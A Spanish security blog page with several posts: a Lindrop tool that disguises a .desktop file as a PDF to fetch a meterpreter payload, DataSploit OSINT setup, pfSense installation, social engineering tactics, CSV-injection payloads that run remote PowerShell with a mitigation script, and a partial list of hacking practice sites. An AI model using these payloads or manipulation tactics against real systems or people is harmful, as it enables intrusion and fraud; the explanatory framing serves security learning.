seguridad perimetral

LINDROP – UN VECTOR DE INGENIERÍA SOCIAL PARA LOS OBJETIVOS LINUX

Posted on

Según expertos de seguridad perimetral y seguridad lógica, la ingeniería social es el arte de manipular a las personas para que entreguen información confidencial. Los tipos de información que estos criminales están buscando puede variar, pero cuando los individuos son atacados, los criminales suelen tratar de engañarlos para que les den sus contraseñas o información bancaria, o acceder a su computadora para instalar en secreto software malintencionado que les dará acceso a sus contraseñas e información bancaria, así como el control de su computadora.

Los expertos de seguridad perimetral y seguridad lógica han creado un vector de ingeniería social para los objetivos Linux. Lindrop – es un vector de ingeniería social para los objetivos linux. Una utilidad python que genera un zip que contiene un archivo .desktop (shortcut) “malicioso” que se disfraza como un archivo PDF (no realmente, una especie de).Probablemente esto no es nada nuevo, pero los hackers y necesitaban una forma de dirigirse específicamente a los usuarios de Linux para ciertos compromisos de ingeniería social, seguridad perimetral y seguridad lógica donde podían enviar un archivo zip y / o tar.gz por correo electrónico y generar algo sobre la marcha.

Los cursos de seguridad perimetral como de iicybersecurity IICS deben enseñar las herramientas como Lindrop para los participantes entienden como implementar seguridad lógica y seguridad perimetral en su red.

Básicamente explota la sección “Exec” de un archivo .desktop para:

  1. Descargue un PDF y muéstrelo al usuario.
  2. Descargue y ejecute una linux/x86/meterpreter/reverse_tcppayload

Según expertos de seguridad perimetral y seguridad lógica, Lindrop toma 4 entradas:

Un nombre de salida para el archivo “PDF” (.desktop) que estará en el archivo zip.

lindrop

Un nombre de salida para el archivo almacenado.

lindrop

Una URL de carga útil remota. (http://www.attacker.com/payload) esto se descargará en el directorio / tmp en el equipo de destino. Para este ejemplo, simplemente estamos creando una carga útil con msfvenom:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload

Un PDF remoto para descargarse y mostrarse al usuario. En el caso de este ejemplo, estamos cargando de forma remota  Blackhat 2016’s Attende survey. Detrás de las escenas, Xpdf se utiliza para abrir el archivo PDF.

lindrop

En el lado del atacante, tenemos un listener usando el siguiente archivo de recursos en metasploit, esperando una conexión desde la carga que el archivo .desktop ha descargado, y que hemos generado anteriormente con msfvenom.

lindrop

Según los expertos de seguridad lógica, las soluciones de seguridad tradicional no detectaran un ataque de este tipo.

 

Advertisements

¿CÓMO HACER UN ATAQUE OSINT (ATAQUE DE INGENIERÍA SOCIAL) CON DATASPLOIT?

Posted on

Independientemente de si usted está atacando un objetivo o a la defensa de uno, es necesario tener una idea clara del panorama de las amenazas de seguridad de la información antes de entrar. Aquí es donde DataSploit entra en juego. Utilizando de las diversas técnicas y herramientas de Open Source Intelligence (OSINT) que hemos encontrado que son efectivas, DataSploit trae a todos en un solo lugar según expertos de seguridad lógica y seguridad perimetral. DataSploit correlaciona los datos capturados y le da al atacante, toda la información relevante sobre el  dominio / correo electrónico / teléfono / persona, etc. Esto le permite recoger la información relevante acerca de un objetivo lo cual puede ampliar su superficie de ataque / defensa muy rápidamente explican expertos de seguridad de la información de iicybersecurity IICS. Por supuesto, un atacante o consultor de seguridad lógica y seguridad perimetral  puede escoger un solo trabajo pequeño (que no se correlaciona obviamente), o puede recoger la búsqueda matriz con lo cual lanzará un montón de consultas, llamadas a otros scripts requeridos de forma recursiva, correlacionar los datos y le dará toda la información directamente.

Creado usando Python, MongoDB y Django, DataSploit simplemente requiere que un mínimo de datos (como nombre de dominio, ID de correo electrónico, nombre de persona, etc.) antes de que salga en una búsqueda detallada. Una vez que se recogen los datos, en primer lugar se quita el ruido, después de lo cual los datos se correlacionan y después de múltiples iteraciones eso es almacenado localmente en una base de datos, lo cual podría ser visualizado fácilmente en UI proporcionada. Las fuentes que se han integrado están todas a mano y se sabe que están proporcionando información confiable. Según Raúl González, experto de seguridad de la información de International Institute of Cyber Security  hemos utilizado anteriormente en diferentes tareas ofensivas, así como en enfrentamientos defensivos y nos parecieron útiles.

FUNCIONALIDADES

  • Realizar OSINT automatizados en un dominio / correo electrónico / nombre de usuario / teléfono y encontrar información relevante a partir de diferentes fuentes.
  • Útil para Pen-testers, Ciber investigadores, empresas de seguridad lógica, seguridad perimetral , los profesionales de seguridad de la información, etc.
  • Trata de averiguar las credenciales, api-keys, fichas, subdominios, la historia del dominio, portales relacionados con el objetivo.
  • Disponible como herramienta de consolidación individual, así como procesos independientes.
  • Disponible tanto en GUI y línea de comandos.

INSTALACIÓN

Si se desea trabajar con web GUI, siga los pasos hasta el 7. De lo contrario, siga hasta el 5 y debería estar bien.

PASO 1 – DESCARGAR DATASPLOIT A TU SISTEMA.

Puede utilizar las herramientas de línea de comandos git con el siguiente comando:

git clone https://github.com/upgoingstar/datasploit.git

,  O simplemente puede descargar el archivo zip y extraer la misma utilizando unzip.

unzip master.zip

PASO 2: INSTALAR LAS DEPENDENCIAS DE PYTHON

Entra en el directorio de la herramienta e instala todas las bibliotecas de Python usando el archivo requirements.txt. En caso de que encuentre “Permiso denegado” error, usa sudo.

cd master

pip install -r requirements.txt

PASO 3: CAMBIAR EL NOMBRE DE CONFIG_SAMPLE.PY A CONFIG.PY

Por favor asegúrate de que config.py se añade en el archivo de gitIgnore para que esto no se comprometa en ningún caso.

mv config_sample.py config.py

PASO 4: GENERAR API KEYS Y PEGAR EN EL INTERIOR DE CONFIG_SAMPLE.PY

Generar API Keys mediante la guia api Key Generation

Necesitamos seguir las claves API para ejecutar esta herramienta de manera eficiente – shodan_api – censysio_id – censysio_secret – zoomeyeuser – zoomeyepass – clearbit_apikey – emailhunter – fullcontact

E introduce los valores respectivos en archivo config.py dejando todo otros valores claves en blanco.

PASO 5: INSTALAR MONGODB

Datasploit utiliza MongoDB en el backend y por lo tanto requiere una instancia en ejecución de MongoDB con el fin de guardar y consultar datos. Instalar la base de datos MongoDB según las instrucciones que a continuación se mencionan con ayuda de  los expertos de seguridad lógica, seguridad perimetral:

Crear un directorio para almacenar los archivos db, e iniciar el servicio MongoDB con esta ruta de la base de datos:

mkdir datasploitDb

mongod –dbpath datasploitDb

PASO 6: INSTALAR RABITMQ

Instalar RabbitMQ para que celery framework puede trabajar de manera eficiente.

PASO 7: INICIAR TODOS LOS SERVICIOS:

brew services restart mongodb

brew services restart rabbitmq

C_FORCE_ROOT=root celery -A core worker -l info –concurrency 20      

python manage.py runserver 0.0.0.0:8000 

Felicitaciones, usted es ahora listo para salir. Pueden  a seguir adelante y ejecutar script automatizado para OSINT en un dominio.

python domainOsint.py <domain_name>

Pueden aprender más sobre OSINT durante el curso de seguridad de la información.

datasploit

SOLUCIÓN GRATUITO DE SEGURIDAD PERIMETRAL PARA ASEGURAR DATOS EMPRESARIAL

Posted on

EL pfSense es una distribución de firewall de red / router de código abierto que se basa en el sistema operativo FreeBSD. El software pfSense se utiliza para hacer firewalls / routers para seguridad perimetral y es considerado por su fiabilidad y ofrece muchas características que en su mayoría se encuentran en los firewalls comerciales. PfSense puede ser incluido con muchos paquetes de software libre de terceros para la funcionalidad adicional según International Institutue of Cyber Security IICS, una empresa de empresa de seguridad de la información.

Este artículo le guiará a través de las instrucciones básicas sobre cómo instalar y configurar pfSense versión 2.1.5 en una red de hogar / oficina para tener seguridad perimetral.

Image result for SOLUCIÓN GRATUITO DE SEGURIDAD PERIMETRAL PARA ASEGURAR DATOS EMPRESARIAL

REQUISITOS DE HARDWARE

  1. Procesador Pentium, 256 MB de RAM, 1 GB de espacio de disco duro, CD-ROM.
  2. Tarjetas Ethernet ,pfSense archivo ISO.

INSTALACIÓN Y CONFIGURACIÓN DE PFSENSE

1.En primer lugar debe visitar la página de descarga pfSense y seleccionar la arquitectura de la computadora y la plataforma. Aquí he elegido “i368 (32 bits)” como arquitectura de ordenador y la plataforma como “LiveCD con instalador“, pero en su caso sería diferente, asegúrese de seleccionar y descargar la arquitectura correcta para su sistema menciona experto de empresa de seguridad de la información.

2. Después de la descarga completa, la imagen descargada debe ser  quemada en un CD / DVD como una imagen ISO antes de empezar a usarla. En caso de, que no tengas una unidad de CD / DVD, puedes utilizar la herramienta Unetbootin para crear un dispositivo USB auto arrancable.

3. A medida que el pfSense se inicia el arranque, el símbolo se muestra con algunas opciones y un temporizador. En este mensaje, pulse 1 para instalar pfSense por defecto como solución de seguridad perimetral.

pfSense-3

 

4. A continuación, pulse “I” para instalar una nueva copia de pfSense, Si tenemos que empezar una recuperación utiliza R, para seguir utilizando Live CD elige C dentro de los 20 segundos con los que se cuenta.

pfSense-4

5. En la siguiente pantalla, se te pedirá que ‘Configure Console’, simplemente pulse ‘Acceptthesesettings’ para seguir adelante con el proceso de instalación.

 

pfSense-5

6. Si eres nuevo en pfSense, elige la opción ‘Quick / EasyInstall ‘para tener las cosas más fáciles o selecciona’ Custom Install ‘para obtener opciones avanzados durante el proceso de instalación.

pfSense-6

7. A continuación, seleccione el disco en el que desea instalar pfSense.

pfSense-7

 

8. A continuación, se te pedirá que formatees el disco seleccionado, si es nuevo disco se debe formatear o si contiene cualquier dato importante deba tener copia de seguridad antes de formatear el disco según recomendaciones de       experto de empresa de seguridad de la información.

 

pfSense-8

9. Seleccione el tamaño del cilindro y la cabeza, aquí usamos la opción de configuración predeterminada ‘Use this Geometry’ para avanzar en la instalación.

pfSense-9

10. En el siguiente paso, se le pedirá una advertencia sobre el formato del disco, si estás seguro de que el disco no tiene datos, sólo sigue hacia adelante con la selección.

pfSense-10

11. Ahora es el momento de particiones en el disco.

pfSense-11

12. A continuación, seleccione las particiones que desea tener en el disco e introduzca un tamaño primo en sectores, luego acepta y crea la partición con el tamaño especificado o puedes seguir adelante con las opciones predeterminadas.

pfSense-12

 

pfSense-12a

13. Una vez que la partición se ha creado correctamente, es hora de instalar bootblocks para instalar el boot loader para pfSense, cortafuego para seguridad perimetral.

pfSense-13

 

14. Seleccione una partición para instalar el pfSense, que también se llama como slice en BSD.

 

pfSense-14

 

pfSense-14a

Se mostrará una alerta de advertencia, diciendo que durante la instalación de partición de pfSense será sobrescrito. Haga clic en el botón “Aceptar” para continuar.

15. A continuación, configura las sub particiones para crear la sub partición según recomendaciones de expertos de iicybersecurity IICS, una empresa de seguridad de la información.

pfSense-15

 

16. Una vez que las sub particiones ha sido creadas, verás el proceso de instalación.

 

pfSense-16

 

17. Por último para instalar el núcleo de seguridad perimetral, se puede elegir entre estas opciones.

 

pfSense-17

 

18. Después de que el núcleo se ha sido instalado, reinicia la máquina y configura la conexión en red.

pfSense-18

19. Después de reiniciar, obtendrás la siguiente pantalla con interfaces disponibles para configurar la red y seguridad perimetral.

pfSense-19

 

20. Después de configurar las interfaces, obtendrás el menú pfSense como se muestra a continuación.

La dirección IP WAN será asignada desde DHCP. Podemos asignar una dirección IP estática.

La dirección IP de LAN será por defecto, 192.168.1.1, si deseas cambiar, selecciona la opción 2 y configurar las interfaces de dirección IP para seguridad perimetral.

pfSense-20

 

21. A continuación, para la interfaz LAN, he elegido 192.168.0.15 como dirección LAN pfSense y para el equipo del cliente  necesito asignar una dirección IP desde DHCP en el rango de 192.168.0.16 – 192.168.0.25.

pfSense-21

22. Abre el enlace dado mediante el protocolo HTTP y escribe en el nombre de usuario “admin“y ‘pfSense ‘como contraseña.

pfSense-22

 

23. Explica experto de empresa de seguridad de la información, Una vez que entras, una ventana con un asistente de configuración de que aparecerá te guiará a través de la configuración inicial de seguridad perimetral.

pfSense-23

 

24. En esta pantalla, configura la interfaz WAN, si usted tiene una conexión PPOE o si necesita usar esta máquina pfSense como un router, tienes que elegir PPOE desde el menú desplegable.

pfSense-24a

 

pfSense-24b

25. A continuación, cambie la contraseña de administrador, que se utiliza para acceder a la de GUI Web y SSH.

pfSense-25

26. Haga clic en el enlace, y le llevará a pfSense webconfigurator GUI Dashboard.

pfSense-26a

pfSense-26b

pfSense-27

El pfSense puede utilizarse como router o firewall con muchas características avanzadas tales como la conformación de tráfico, solución de seguridad perimetral, el equilibrador de carga y mucho más. Según experiencia de empresa de seguridad de la información, puede ser utilizado en pequeña escala o en una empresa mediana o grande.

DIVERSAS METODOLOGÍAS Y TIPOS DE ATAQUES DE INGENIERÍA SOCIAL

Posted on Updated on

La ingeniería social es el término que se utiliza para la explotación de las debilidades de la conducta humana para tener acceso a una organización o sistema, o invadir el espacio físico o virtual de una organización.

Según experiencia de expertos de pruebas de penetración de International Institute of Cyber Security, los ingenieros sociales utilizan una amplia variedad de métodos para obtener acceso a información confidencial o reservada, y el ingenio de los atacantes maliciosos significa que siempre se inventan nuevos métodos y nuevas formas de empleo para romper la seguridad lógica y seguridad perimetral.

CqMx7tVUsAM1bO7

Aquí presentamos algunos de los métodos más comunes utilizados por los ingenieros sociales.

1. OBTENCIÓN DE INFORMACIÓN

Los ingenieros sociales inician mediante la búsqueda de la información que puede ser utilizada para penetrar en un sistema o una organización. Se utilizan varios métodos de confianza que animan a la gente a compartir información, y cuanto más se sabe acerca de un individuo o una organización, más fácil es para ellos para atacar la seguridad lógica y seguridad perimetral.

Según experiencia de expertos de pruebas de penetración de iicybersecurity IICS, algunos métodos de baja tecnología que los ingenieros sociales pueden utilizar para atacar la seguridad lógica y seguridad perimetral son:

  • El arrastre de objetos valiosos en estacionamientos. Los Coches pueden contener tarjetas de seguridad, teléfonos inteligentes, las carpetas, documentos confidenciales u otros artículos de gran valor para un ingeniero social.
  • Los sitios de medios sociales como Facebook, Linked In, y Google + son ricas fuentes de información sobre los individuos y organizaciones.
  • Un buen ingeniero social encontrara una oportunidad de mirar a través de la basura un verdadero tesoro de información descartada, pero útil.
  • Creación de un pretexto (también llamado “pretexting”) es la técnica de inventar un escenario plausible como olvidar la propia tarjeta de identificación o tener problemas informáticos que incitan a la víctima a permitir voluntariamente al ingeniero social tener acceso a su ordenador o al sistema y romper la seguridad lógica y seguridad perimetral .
  • Un ingeniero social pasa el tiempo averiguando donde el objetivo pasa el tiempo, dónde compra, a que los clubes pertenece, a qué actividades se dedica.

2. CÓMO FAMILIARIZARSE CON GENTE

Como hemos señalado anteriormente, el objetivo de un ataque de ingeniería social es obtener información para pasar la seguridad lógica y seguridad perimetral, por lo general con el fin de ejecutar una técnica más profunda en una organización. El método para lograr esto es establecer una confianza inapropiada. Como siempre, los ingenieros sociales tienen una gran cantidad de métodos para lograr esto.

El ingeniero social puede frecuentar un bar que es muy popular entre los empleados o un club o un restaurante que es un favorito de los ejecutivos de la empresa objetivo, saludando y conversando con la gente hasta que él o ella llega a ser reconocido e incluso es saludado con una sonrisa.

Otra técnica que se utiliza para establecer la familiaridad, es que el ingeniero social puede elegir un grupo de personas para entrar en el edificio con de forma periódica, ya sea continua hasta el fondo o desviarse en el último minuto. En cualquier caso, el impostor se las arregla para ser una cara conocida en el grupo explica experto de pruebas de penetración.

Los ingenieros sociales también utilizarán las redes sociales para reforzar su familiaridad, su interés en ser un amigo o conexión, y siguiendo a la gente para establecer su presencia.

3. PIGGYBACKING

Una forma en que los ingenieros sociales utilizan su familiaridad cuidadosamente. Piggybacking es una de las más antiguas tácticas de infiltración en la historia, mucho más antigua que la propia era de la información.

A veces, la táctica se utiliza para seguir a otro empleado en una zona de acceso restringido: el ingeniero social se correrá después de un empleado de entrar en la sala de servidores.

En otro tipo de ataque piggybacking, el ingeniero social pretenderá ser una persona de la entrega, incluso a aparecer en uniforme. Él o ella se acercarán a la puerta justo detrás de otros empleados, cargado con un paquete, y solicitará a alguien para mantener la puerta “piggybacking” en el acceso legítimo de otra persona y pasar la seguridad lógica y seguridad perimetral.

4. GANAR LA CONFIANZA CON EL LENGUAJE CORPORAL

Los ingenieros sociales son expertos en su campo y están bien educados en la lectura del lenguaje corporal y en la proyección de mensajes utilizando el lenguaje corporal explican los expertos de pruebas de penetración.

Inhalando al mismo ritmo que el blanco, sonriendo íntimamente y de manera apropiada, reaccionando y respondiendo a los cambios emocionales, estas son sólo una muestra de las señales psicológicas sutiles un ingeniero social puede utilizar para hacer una conexión con un empleado para pasar la seguridad lógica y seguridad perimetral.

Mediante la creación de confianza a un nivel inconsciente, la gente por defecto a desea de ayudar a sostener la puerta para que el impostor puede entrar en la empresa, ayudando a pegar su ordenador a la red, y así sucesivamente. El ingeniero social, en este caso, crea una atmósfera donde la asistencia es automática, y el objetivo responde sin pensar.

5. GANAR LA CONFIANZA CON EL SEXO

Tan obvio como es, los individuos seleccionados caen en la trampa cada vez: Sexo. Un ingeniero social puede ganar la confianza al mostrarse atractivo para un individuo en la sociedad, e incluso salir con la persona y el desarrollo de una relación íntima. A veces, un coqueteo hará el truco, y el objetivo será proporcionar la información sin problemas de seguridad perimetral.

Pero si el coqueteo por sí solo no es suficiente para ganar la confianza suficiente de la víctima, un ingeniero social dedicado escalará la relación, pidiendo a la victima por una cita, lo garantizando que la cita salga bien y el seguimiento con más citas, más tiempo juntos, más confianza para pasar la seguridad lógica y seguridad perimetral.

6. EL USO DE HOSTILIDAD

Una alternativa al establecimiento de la confianza y romper la seguridad perimetral es establecer la hostilidad en contra de la intuición y hostilidad es otra forma de intimidad.

La hostilidad genera la intimidad o confiar en esta forma: la gente en general, prefiere evitar a las personas hostiles. Si alguien suena o parece enojado, la reacción instintiva es permanecer fuera de su camino y evitar que enfureciera aún más – tal vez la apertura de puertas, dirigirlos a áreas sensibles, o la oferta de simpatía en un esfuerzo por evitar o mitigar la ira.

Una manera en que los ingenieros sociales utilizan este aspecto de la conducta humana es mediante la unión con sus objetivos sobre la causa de su enojo. ¿Quién no va a ofrecer simpatía después de una mala sesión con uno de la compañía de seguros? Al compartir frustraciones, un ingeniero social puede fomentar un sentido de camaradería con un objetivo desprevenido mencionan los expertos de pruebas de penetración.

Otra forma que los ingenieros sociales pueden utilizar una situación hostil es si tienen que ir a través de las zonas sensibles en las instalaciones físicas de una organización y pasar la seguridad perimetral.

7. OBTENER UNA ENTREVISTA Y UN TRABAJO

Objetivos de hackers – es decir, las organizaciones con una gran cantidad de datos valiosos – valen una mayor inversión de tiempo y energía, incluso hasta el punto de invertir meses o años en la infiltración de una empresa. Un ingeniero social con una agenda ambiciosa podría tener éxito en conseguir un puesto de trabajo, aunque la entrevista por sí solo puede proporcionar suficiente información para proceder al siguiente nivel de ataque para hackear la seguridad perimetral y seguridad lógica.

Una sorprendente cantidad de información confidencial o sensible puede ser intercambiada durante una entrevista, en particular uno con un candidato prometedor. Los ingenieros sociales son expertos en hacer las preguntas correctas tal vez acerca de la tecnología de TI en funcionamiento, y los detalles de un proceso de negocio.

Se establece un nivel de comodidad y familiaridad. El candidato puede incluso manejar la situación para conseguir que el entrevistador inicie sesión en el sistema allí mismo, obteniendo toda la información que necesitan de la entrevista a solas, y nunca tener que mostrarse para un día de “trabajo”.

Sin embargo, el entrevistador no puede ser llevado tan fácilmente, en cuyo caso, si la organización de destino es lo suficientemente valiosa, el ingeniero social podría tener éxito en la infiltración de la empresa desde dentro, por conseguir un empleo y la obtención de las credenciales oficiales según experiencia de los consultores de pruebas de penetración.

8. ACTUANDO COMO UN CONSULTOR

Un ingeniero social puede en cambio optar por ingresar a la compañía como consultor. Los consultores son a menudo confiados con una enorme cantidad de información confidencial de seguridad perimetral, seguridad lógica después de que hayan firmado sus acuerdos de no divulgación. Los asesores deben ser cuidadosamente examinados, y las referencias obtenidas y confirmadas antes de contratarlos, los niveles de confianza se deben aumentar lentamente.

9. HABLAR DE LA CHARLA

Una de las tácticas de gran alcance en la caja de herramientas de los ingenieros sociales es el conocimiento mencionan los expertos de pruebas de penetración. Un ingeniero social experto puede usar esas habilidades para conseguir una entrevista o incluso un puesto de trabajo, pero él o ella puede crear confianza simplemente por estar bien informado. Las personas sin conocimientos técnicos pueden ser fácilmente superadas por las personas que tienen derecho a las palabras de moda y jergas de la industria, ya que a menudo proporcionan voluntariamente contraseñas, acceso a sistemas de seguridad lógica a una persona que simplemente suena bien informado y seguro de sí mismo.

10. INGENIERÍA SOCIAL INVERSA

Por último, existe la táctica conocida como ingeniería social inversa (RSE), en la que el ingeniero social crea un problema y, a continuación interviene para resolverlo. Esta táctica tiene tres pasos básicos: el sabotaje inicial, que ofrecen asistencia e infiltración.

En primer lugar, un ingeniero social utiliza una jugada para alertar departamento de TI que están bajo ataque. Esto puede ser un ataque de denegación de servicio en su página web, o tal vez es tan simple como enviar un correo electrónico de phishing. El objetivo es asegurar que ellos conocen que están bajo ataque y que la seguridad perimetral, seguridad lógica puede verse comprometida.

 

A continuación, el ingeniero social aparece como un consultor de seguridad perimetral, seguridad lógica o agencia. Con una gran cantidad de conocimientos sobre el problema, ya que ellos ayudaron a causarlo demuestran su experiencia y su capacidad para solucionar el problema y ofrecer ayuda. Por último, después de haber sido contratado para solucionar el problema que han causado, los atacantes son capaces de ejecutar la actividad maliciosa, al igual que la posibilidad de subir malware o el robo de datos confidenciales.

La primera línea de defensa contra los ataques de ingeniería social es un buen programa de educación para sus empleados y tener seguridad perimetral, seguridad lógica pero no puede terminar ahí. Con el fin de fomentar una cultura de comportamiento defensivo, las organizaciones puede configurar pruebas de penetración sin previo aviso a los empleados, utilizando técnicas de ingeniería social inesperadas en momentos aleatorios. Según expertos de International Institute of Cyber Security iicybersecurity, Si los empleados están condicionados a pensar y actuar de forma segura, es más probable que lo hagan cuando se enfrentan a una amenaza real.

¿CÓMO MITIGAR UN ATAQUE DE INYECCIÓN CSV?

Posted on

Los expertos de seguridad web mencionan que un atacante puede explotar esta funcionalidad mediante la inserción de caracteres arbitrarios en formas que sean exportables (sea esto a través de un análisis, contactos u otras funcionalidades). Permitiendo en consecuencia, a dicho atacante pueda formular una carga útil de ataque que se ejecuta cuando dicho archivo CSV se descarga y podría romper seguridad perimetral.

El escenario de este ataque se dirige  puramente al usuario (s) que descarga el archivo CSV, naturalmente, este ataque de seguridad web se suele descartar como un problema sin embargo sitios web todavía deben estar al tanto de la información que están exportando porque puede ser potencialmente perjudicial para seguridad perimetral de los usuarios.

El playload más común visto es similar a la que se muestra a continuación:

=cmd|’ /C calc’!A0

Esta cadena en su núcleo, le está diciendo esencialmente al programa que está abierto con el programa que le gustaría ejecutar cmd.exe con las siguientes banderas /C calc que a su vez pondrán en marcha calc.exe desde la línea de comandos.

Para formular un payload meterpreter en la víctima, hemos adaptado una cadena de payload para que sea más corto y más fácil de inyectar, como resultado, el siguiente payload se puede utilizar

=cmd|'/C powershell IEX(wget 0r.pe/p)'!A0

Donde en este caso url cortado 0r.pe es utilizado para entregar el payload para no ser detectado por seguridad perimetral(Invoke-Shellcode) que es una función de Powersploit para permitir la entrega de meterpreteshells. Para acortar el payload aún más la siguiente cadena también se puede utilizar, que corta la necesidad de la cadena de cmd.

=powershell|'IEX(wget 0r.pe/p)'!A0

Esto directamente lanzará PowerShell desde la célula afectada en editor de hojas de cálculo de su elección. Estos payloads están todos muy bien y bien sin embargo, la  mayoría de las veces que no he estado viendo el = carácter está siendo filtrado hacia fuera menciona experto de seguridad web.

Sin embargo, utilizando el conocimiento personal Microsoft Excel y seguridad web, también es posible intact el payload usando otras combinaciones de caracteres tales como @, + o – en una variedad de diferentes combinaciones.

@SUM(1+1)*cmd|’ /C calc’!A0

O para cuantificar el peligro:

@SUM(1+1)*cmd|' powershell IEX(wget 0r.pe/p)'!A0

Una vez dicho todo esto y hablado de los diversos payloads hay pasos de mitigación que se pueden tomar para eliminar más o menos la amenaza de secuencias de comandos PowerShell que infestan el sistema de un usuario con shells acuerdo a los expertos de seguridad web.

PASOS PARA LA MITIGACIÓN

Las medidas recomendadas para remediar este problema de seguridad web se han descrito anteriormente sería asegurar que las formulario que se pueden exportar si contengan únicamente caracteres alfanuméricos y no puedan ser modificados para añadir caracteres arbitrarios.

También se debe considerar que todas las entradas de los usuarios no pueden  ser de confianza y como resultado cualquier salida debe ser codificada. La salida de esta funcionalidad se debe asumir como texto y no fórmulas. Lo que podrían adoptarse medidas para designar fácilmente como tal al colocar las cotizaciones en todo el texto o la aplicación de características de escape como se describe y se demuestra a continuación según curso de seguridad perimetral.

El problema con los vectores de inyección CSV discutidos arriba no tiene en realidad que ver con el carácter @, o =, +, -. El problema radica en el carácter pipe (|), el cual Excel y otras aplicaciones interpretan para ejecutar comandos {arbitrarios} y windows lanza binarios. De la lectura de los ataques de seguridad web y la investigación de las posibles técnicas de mitigación con ayuda de expertos de seguridad perimetral que la mejor solución es escapar del carácter pipe en este escenario de ataque es poner un prefijo \ antes del pipe. Esto se debe a que  Excel y otros programas que buscan un ejecutable llamado  cmd.exe o powershell.exe sin embargo, cuando añadiendo un \ dentro de la trayectoria evitará el lanzamiento de exe.

Además también hemos escrito un script en Python para escapar de archivos CSV que se pueden ver a continuación, es una prueba rápida del concepto sin embargo se puede adaptar fácilmente:

def escape(payload):   

           if payload[0] in (‘@’,’+’,’-‘, ‘=’, ‘|’):           

                payload = payload.replace(“|”, “\|”)            

               payload = “‘” + payload + “‘”    

            return payload 

# An example of payload string payload

= “@cmd|’ /C calc’!A0”

print “The Unescaped version is: ” + payload

print “When passed though escape function the value is: ” +

escape(payload)

En el código anterior se puede observar que si una cadena de payload contiene cualquiera de los caracteres en la lista negra se han evitado el ataque, esto se demuestra en la salida del script:

root@zsec:# python escape_csv.py

El version Unescaped es:

“@cmd|’ /C calc’!A0”

When passed though escape function the value is: ‘@cmd\|’ /C calc’!A0′

Note que desde la salida se puede ver que la versión escapada tiene un conjunto de’ alrededor de la cadena de usuario y el carácter pipe también se ha escapado. Cabe señalar que los problemas descritos anteriormente son sólo un tipo de ataque de inyección CSV, esta mitigación no cubre los ataques sobre seguridad web que se pueden llevar a cabo utilizando la misma técnica pero con diferentes payloads.

21 SITIOS PARA PRACTICAR SUS HABILIDADES DE HACKING Y CIBERSEGURIDAD

Posted on

Servicios y soluciones de ciberseguridad se encuentran en tan alta demanda en este momento. A medida que el mundial siga convirtiendo todo en una aplicación y conectando incluso los dispositivos más básicos de internet, la demanda sólo va a crecer, por lo que no es de extrañar que todos quieran aprender hacking estos días.

Sin embargo, casi todos los días nos encontramos con un mensaje en el foro en el que alguien está pidiendo a donde deben empezar a aprender hacking o la forma de practicar hacking. Hemos recopilado esta lista de algunos de los mejores sitios de ciberseguridad, seguridad perimetral y hacking acuerdo a curso de ciberseguridad que esperamos sea un valioso recurso para los que se preguntan cómo pueden construir y practicar su conjunto de habilidades de hacking.

 

1. CTF365

En CTF365 los usuarios construyen y defienden sus propios servidores con soluciones de ciberseguridad, mientras que lanzan ataques a los servidores de otros usuarios. El entorno de formación CTF365 está diseñado para profesionales de seguridad perimetral que están interesados en el curso de ciberseguridad y formación de sus habilidades ofensivas o sysadmins interesados en mejorar sus habilidades defensivas. Si usted es un principiante a infosec, puede registrarse para obtener una cuenta gratuita para principiantes y empezar a probar con algunos servidores vulnerables pre-configurados.

 

CTF365

2. OVERTHEWIRE

OverTheWire está diseñado para personas de cualquier nivel de experiencia con soluciones de ciberseguridad para aprender y practicar conceptos de curso de ciberseguridad. Los principiantes absolutos van a querer comenzar en los retos del Bandit, ya que son los bloques de construcción que utilizará para completar otros retos.

 

Overthewire

3. HACKING-LAB

Hacking-Lab ofrece los desafíos del CTF (Desafío Europea para la Seguridad Cibernética), sino que también alberga desafíos en marcha para su plataforma que cualquiera puede participar. Según expertos de soluciones de ciberseguridad, sólo es necesario registrarse con cuenta gratuita, configurar vpn y comenzar a explorar los desafíos que ofrecen.

 

hacking-lab

 

4. PWNABLE.KR

pwnable.kr se centra en los retos ” pwn”, similar a CTF, que requieren encontrar, leer y enviar archivos de “bandera” que corresponden a cada desafío. Debes usar algún tipo de programación, ingeniería inversa o habilidad explotación para acceder al contenido de los archivos antes de estar en condiciones de presentar las soluciones de ciberseguridad. Dividen el reto en 4 niveles de habilidades de curso de ciberseguridad: Toddler’s Bottle, Rookiss, Grotesque and Hacker’s Secret.

 

pwnable.kr

 

5. IO

IO es un juego de guerra de los creadores de netgarage.org, un proyecto comunitario, donde personas afines comparten conocimientos acerca del curso de ciberseguridad, seguridad perimetral, la IAVR y mucho más. Han creado 3 versiones, IO, IO64 y IOarm, con IO que es el más maduro. Conecte a IO a través de SSH y puedes comenzar el hackeo en sus desafíos.

 

io-wargame

 

6. SMASH THE STACK

Smash The Stack se compone de 7 diferentes juegos de guerra contra soluciones de ciberseguridad – Amateria, Apfel, Blackbox, Blowfish, CTF logic y Tux. Cada juegeo tiene una variedad de desafíos que van desde las vulnerabilidades estándar para retos de ingeniería inversa de malware.

 

smash-the-stack

 

7. MICROCORRUPTION

Microcorruption es un CTF de seguridad incorporado donde usted tiene que hacer ingeniería inversa a dispositivos Lockitall de tipo candado electrónico. Según expertos de curso de ciberseguridad y seguridad perimetral en el camino usted aprenderá un poco de montaje, cómo utilizar un depurador, cómo desbloquear en un solo paso el código de bloqueo, establecer puntos de interrupción, y examinar la memoria, todo ello en un intento de robar los bonos al portador de los almacenes.

 

microcorruption

 

8. REVERSING.KR

reversing.kr cuenta con 26 desafíos para poner a prueba sus capacidades de ingeniería inversa y soluciones de ciberseguridad. El sitio no ha sido actualizado desde finales de 2012, pero los desafíos aún están disponibles y son valiosos recursos de aprendizaje.

 

reversing.kr

 

9. HACKTHISSITE

HackThissite es un sitio libre para probar juegos de guerra y ampliar sus habilidades de hacking y seguridad perimetral. Cuenta con numerosas misiones de hacking contra soluciones de ciberseguridad a través de múltiples categorías, incluyendo básico, realista, aplicación, programación, phreaking teléfono, JavaScript, forense, Stego y misiones de IRC.

 

hackthissite

10. W3CHALLS

W3Challs es una plataforma de curso de ciberseguridad con numerosos retos a través de diferentes categorías, incluyendo hacking, cracking, juegos de guerra, forense, Criptografía, esteganografía y programación. Según expertos de seguridad perimetral, el objetivo de la plataforma es proporcionar retos realistas, no simulaciones y los puntos se otorgan en base a la dificultad del reto (fácil, medio, difícil). Hay un foro de seguridad perimetral donde se puede discutir y atravesar los desafíos con otros miembros.

 

w3challs

 

11. PWN0

